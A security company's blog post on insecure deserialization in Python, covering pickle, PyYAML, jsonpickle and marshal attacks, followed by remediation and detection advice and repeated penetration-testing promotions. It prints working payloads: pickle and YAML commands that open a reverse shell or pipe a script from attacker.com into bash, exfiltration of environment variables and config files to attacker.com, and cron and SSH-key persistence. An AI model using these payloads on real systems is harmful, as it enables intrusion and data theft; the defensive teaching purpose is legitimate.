Insecure Deserialization in Python: Exploits & Defenses

Date

July 15, 2025

Author

Karan Patel

CEO

If you are a developer, security engineer, or architect working with Python applications, understanding this vulnerability class is not optional. It is a prerequisite for building systems that survive contact with real-world adversaries.

This blog walks you through what insecure deserialization is, how attackers exploit it in Python, working proof-of-concept commands, and how to remediate it before it costs you.

What Is Serialization and Why Does It Matter

Serialization is the process of converting an in-memory object into a format that can be stored or transmitted, such as a byte stream, JSON blob, or XML document. Deserialization is the reverse: reconstructing the object from that format back into memory.

This is used everywhere: session tokens, API payloads, caching layers, message queues, inter-process communication, and file storage. When the deserialization process trusts external input without validation, attackers can supply a crafted payload that forces the application to execute arbitrary code, escalate privileges, or exfiltrate data.

The root problem is not the concept of serialization itself. It is when applications deserialize data from untrusted sources using libraries that execute code during the reconstruction process.

Python's Most Dangerous Serialization Libraries

The pickle Module

Python's built-in pickle module is the most notorious offender. The official Python documentation itself warns that pickle is not secure against maliciously constructed data. Despite this, it remains widely used in data science pipelines, ML model storage, caching systems, and session management.

Pickle allows objects to define a __reduce__ method that controls how they are serialized and, critically, deserialized. Attackers abuse this to embed OS commands inside a pickled payload.

Generating a malicious pickle payload:

import pickle import os class MaliciousPayload(object): def __reduce__(self): return (os.system, ('id',)) payload = pickle.dumps(MaliciousPayload()) print(payload)

[cta]

‍Triggering execution on the target:

import pickle # Simulating what a vulnerable application does data = b'\x80\x04\x95...' # Attacker-supplied bytes pickle.loads(data) # This executes: os.system('id')

[cta]

When the application calls pickle.loads() on attacker-controlled data, the command runs. There is no sandbox. There is no prompt. The payload executes in the context of the running process.

Reverse shell via pickle:

import pickle import os class ReverseShell(object): def __reduce__(self): cmd = "bash -i >& /dev/tcp/attacker.com/4444 0>&1" return (os.system, (cmd,)) payload = pickle.dumps(ReverseShell()) # On attacker machine: nc -lvnp 4444 # Victim app receives and loads this payload

[cta]

This is not theoretical. This exact technique has been used to compromise ML serving platforms, Flask-based APIs using pickled sessions, and internal tooling that caches Python objects.

If your organization's Python applications are handling serialized data from external sources, you need a professional assessment to determine your exposure. Redfox Cybersecurity's penetration testing services cover deserialization attack chains as part of a comprehensive web application engagement.

PyYAML and the yaml.load() Vulnerability

YAML is used everywhere for configuration files, CI/CD pipelines, and API data. PyYAML's yaml.load() function, when called without a safe loader, supports Python-specific tags that allow object instantiation during parsing.

Vulnerable code:

import yaml data = yaml.load(user_input) # Dangerous: no Loader specified

[cta]

‍Attacker-supplied YAML payload:

!!python/object/apply:os.system args: ['curl http://attacker.com/shell.sh | bash']

[cta]

When the application processes this string through yaml.load(), it executes the shell command. This is a one-liner exploit that requires no authentication bypass, no memory corruption, and no complex tooling.

Demonstrating the exploit:

python3 -c " import yaml payload = \"!!python/object/apply:os.system ['id']\" yaml.load(payload) "

[cta]

Output: The id command executes and prints the current user context of the process.

This class of vulnerability has affected well-known projects including Ansible and various DevOps tools. Any Python application that parses YAML from user-controlled input without using yaml.safe_load() is at risk.

jsonpickle: Dangerous by Design

jsonpickle is a library that serializes arbitrary Python objects to JSON. Unlike standard JSON, it preserves Python type information by embedding class references directly in the serialized output. This makes it trivially exploitable.

Crafting a jsonpickle RCE payload:

import jsonpickle class Exploit(object): def __reduce__(self): return (eval, ("__import__('os').system('id')",)) serialized = jsonpickle.encode(Exploit()) print(serialized) # Output: {"py/reduce": [{"py/function": "builtins.eval"}, {"py/tuple": [...]}]}

[cta]

Any application calling jsonpickle.decode() on this string will execute the embedded command.

Sending the payload over HTTP:

curl -X POST http://target.com/api/deserialize \ -H "Content-Type: application/json" \ -d '{"py/reduce": [{"py/function": "builtins.eval"}, {"py/tuple": ["__import__(\"os\").system(\"id\")"]}]}'

[cta]

If the endpoint passes the body through jsonpickle.decode(), code execution is immediate.

shelve and marshal

Python's shelve module uses pickle internally to store objects, meaning any application that reads shelve databases from untrusted sources inherits all of pickle's vulnerabilities.

marshal is even more restricted: it is explicitly documented as insecure for untrusted data and should never be used to deserialize data from external sources.

import marshal # Dangerous: deserializing attacker-controlled marshal data code = marshal.loads(attacker_bytes) exec(code) # Arbitrary code execution

[cta]

How Attackers Identify Deserialization Vulnerabilities

Understanding the attacker's reconnaissance workflow helps defenders think like threat actors.

Step 1: Fingerprint the application stack

# Look for Python framework indicators in HTTP headers curl -I http://target.com # Check for Flask, Django, FastAPI signatures # X-Powered-By, Server headers, error pages

[cta]

‍Step 2: Intercept and decode serialized tokens

# Base64-decode suspicious cookies or parameters echo "gASVHgAAAAAAAAB9lCiMAmlklEsBjARuYW1llIwFYWRtaW6Uu..." | base64 -d | xxd | head

[cta]

The magic bytes \x80\x04 or \x80\x03 at the start indicate a pickle payload. Attackers immediately know what library to target.

Step 3: Generate and encode the exploit payload

import pickle, os, base64 class Exploit: def __reduce__(self): return (os.system, ('curl http://attacker.com/exfil?u=$(whoami)',)) payload = base64.b64encode(pickle.dumps(Exploit())).decode() print(payload)

[cta]

‍Step 4: Deliver the payload

# Inject into a cookie curl http://target.com/dashboard \ -H "Cookie: session=gASV..." # Inject into a POST parameter curl -X POST http://target.com/api/upload \ -d "data=gASV..."

[cta]

‍Step 5: Catch the callback

# On attacker machine, start a listener nc -lvnp 80 # Or use a Burp Collaborator / interactsh instance

[cta]

This five-step chain is what a real attacker executes. The window between an unpatched deserialization endpoint and full server compromise is minutes, not hours.

Want to know if your applications are vulnerable to this exact chain before attackers find it? Request a penetration test from Redfox Cybersecurity and get a professional, evidence-based assessment of your attack surface.

Real-World Impact: What Attackers Do After Initial Access

Gaining code execution through a deserialization vulnerability is only the beginning. Post-exploitation steps commonly include:

Privilege escalation:

# Check sudo rights sudo -l # Look for SUID binaries find / -perm -4000 2>/dev/null # Check for writable cron jobs ls -la /etc/cron*

[cta]

‍Lateral movement within the network:

# Scan internal network from the compromised host python3 -c " import socket for port in [22, 80, 443, 3306, 5432, 6379, 27017]: s = socket.socket() s.settimeout(0.5) result = s.connect_ex(('10.0.0.1', port)) if result == 0: print(f'Port {port} open') s.close() "

[cta]

‍Data exfiltration:

# Dump environment variables (often contains secrets, API keys, DB credentials) env | base64 | curl -X POST http://attacker.com/collect -d @- # Steal application secrets cat /app/config.py | base64 | curl -X POST http://attacker.com/collect -d @-

[cta]

‍Persistence:

# Add SSH key to authorized_keys echo "ssh-rsa AAAA...attacker-key..." >> ~/.ssh/authorized_keys # Write a cron job for persistent reverse shell echo "* * * * * bash -i >& /dev/tcp/attacker.com/4444 0>&1" | crontab -

[cta]

A single deserialization endpoint can be the entry point for a full organizational breach. This is not a theoretical risk. It is the documented kill chain behind multiple high-profile ransomware deployments and data theft incidents.

Secure Remediation: How to Fix Insecure Deserialization in Python

Never Deserialize Untrusted Data with pickle

The simplest fix is to never use pickle, shelve, or marshal with data from external sources. There is no safe way to sandbox pickle deserialization in Python.

Switch to safer alternatives for data interchange:

import json # Serialize data = {"user_id": 1, "role": "admin"} serialized = json.dumps(data) # Deserialize safely parsed = json.loads(serialized)

[cta]

JSON, msgpack, and protobuf are appropriate formats for transmitting structured data between services. They do not execute code during parsing.

Use yaml.safe_load() Instead of yaml.load()

import yaml # Vulnerable data = yaml.load(user_input) # Secure data = yaml.safe_load(user_input)

[cta]

‍yaml.safe_load() only parses standard YAML types (strings, integers, lists, dicts) and does not support Python-specific tags that allow object instantiation.

Validate and Sign Serialized Data

If you must use pickle internally (for example, in ML pipelines where models are serialized), implement cryptographic signing to verify integrity before deserialization.

import pickle import hmac import hashlib SECRET_KEY = b'your-secret-key-here' def serialize_signed(obj): data = pickle.dumps(obj) signature = hmac.new(SECRET_KEY, data, hashlib.sha256).hexdigest() return signature.encode() + b':' + data def deserialize_verified(blob): sig, data = blob.split(b':', 1) expected_sig = hmac.new(SECRET_KEY, data, hashlib.sha256).hexdigest() if not hmac.compare_digest(sig.decode(), expected_sig): raise ValueError("Invalid signature: data may have been tampered with") return pickle.loads(data)

[cta]

This ensures that only data serialized by your own application can be deserialized. Attacker-crafted payloads will fail the signature check before pickle.loads() is ever called.

Implement Allowlist-Based Deserialization

For cases where you need to support custom object types, use a custom unpickler that restricts which classes can be instantiated.

import pickle import io ALLOWED_CLASSES = { ('myapp.models', 'UserSession'), ('myapp.models', 'CartItem'), } class RestrictedUnpickler(pickle.Unpickler): def find_class(self, module, name): if (module, name) not in ALLOWED_CLASSES: raise pickle.UnpicklingError( f"Blocked: {module}.{name} is not in the allowlist" ) return super().find_class(module, name) def safe_loads(data): return RestrictedUnpickler(io.BytesIO(data)).load()

[cta]

This approach stops arbitrary class instantiation while still allowing your application's own object types to be deserialized.

Adopt Structured Serialization Formats

For service-to-service communication, move to schema-validated formats:

# Using Protocol Buffers from google.protobuf import message # Using Pydantic for schema validation from pydantic import BaseModel class UserPayload(BaseModel): user_id: int role: str permissions: list[str] # Validation happens automatically; no code execution possible user = UserPayload(**json.loads(incoming_data))

[cta]

Pydantic validates structure and types but does not instantiate arbitrary Python classes. It is a safe, production-grade alternative for API payload validation.

Detection: How to Find Deserialization Vulnerabilities in Your Codebase

Grep for dangerous patterns in your Python codebase:

# Find all pickle usage grep -rn "pickle.loads\|pickle.load\|cPickle.loads" ./src # Find unsafe YAML loading grep -rn "yaml.load(" ./src | grep -v "safe_load" # Find jsonpickle decode calls grep -rn "jsonpickle.decode\|jsonpickle.loads" ./src # Find marshal usage grep -rn "marshal.loads\|marshal.load" ./src # Find shelve usage with external data grep -rn "shelve.open" ./src

[cta]

‍Automate static analysis with Bandit:

pip install bandit bandit -r ./src -t B301,B302,B303,B304,B506

[cta]

Bandit rule B301 flags pickle calls, B506 flags unsafe yaml.load(). Integrate this into your CI/CD pipeline so vulnerabilities are caught before they reach production.

Dynamic scanning with custom payloads:

# Generate a detection payload that makes an out-of-band DNS request python3 -c " import pickle, os, base64 class Probe: def __reduce__(self): return (os.system, ('nslookup your-collaborator-id.oast.me',)) print(base64.b64encode(pickle.dumps(Probe())).decode()) "

[cta]

Inject this into every parameter, cookie, and request body that appears to accept serialized data. If you receive a DNS callback, the endpoint is vulnerable.

Running these detection steps manually across a large application surface is time-intensive and easy to miss. Professional penetration testing automates and validates this process across your entire attack surface. Engage Redfox Cybersecurity to conduct a thorough assessment of your Python applications, APIs, and internal tooling.

Closing Thoughts

Insecure deserialization in Python is not a niche vulnerability. It sits at the intersection of trusted libraries, common development patterns, and catastrophic impact. The Python ecosystem's reliance on pickle for ML model storage, session management, and caching means that the exposure is far broader than most development teams realize.

The attack primitives are well-documented, the tooling is publicly available, and the path from a deserialization endpoint to full server compromise is short. Developers need to treat serialized data from external sources the same way they treat SQL input: as inherently untrusted, requiring explicit validation and safe handling patterns.

Remediation starts with code: replace pickle with JSON or protobuf, switch yaml.load to yaml.safe_load, validate schemas with Pydantic, and integrate Bandit into your CI pipeline. But code review alone does not find everything. Runtime behavior, third-party dependencies, and undocumented internal endpoints often carry deserialization vulnerabilities that static analysis cannot surface.

That is where professional security testing closes the gap. Redfox Cybersecurity's penetration testing services combine automated scanning with manual exploitation techniques to identify deserialization vulnerabilities, prove impact through controlled exploitation, and deliver actionable remediation guidance your engineering team can act on immediately.

Do not wait for a breach to discover your exposure. Get ahead of it.

Insecure Deserialization in Python: Exploits & Defenses

What Is Serialization and Why Does It Matter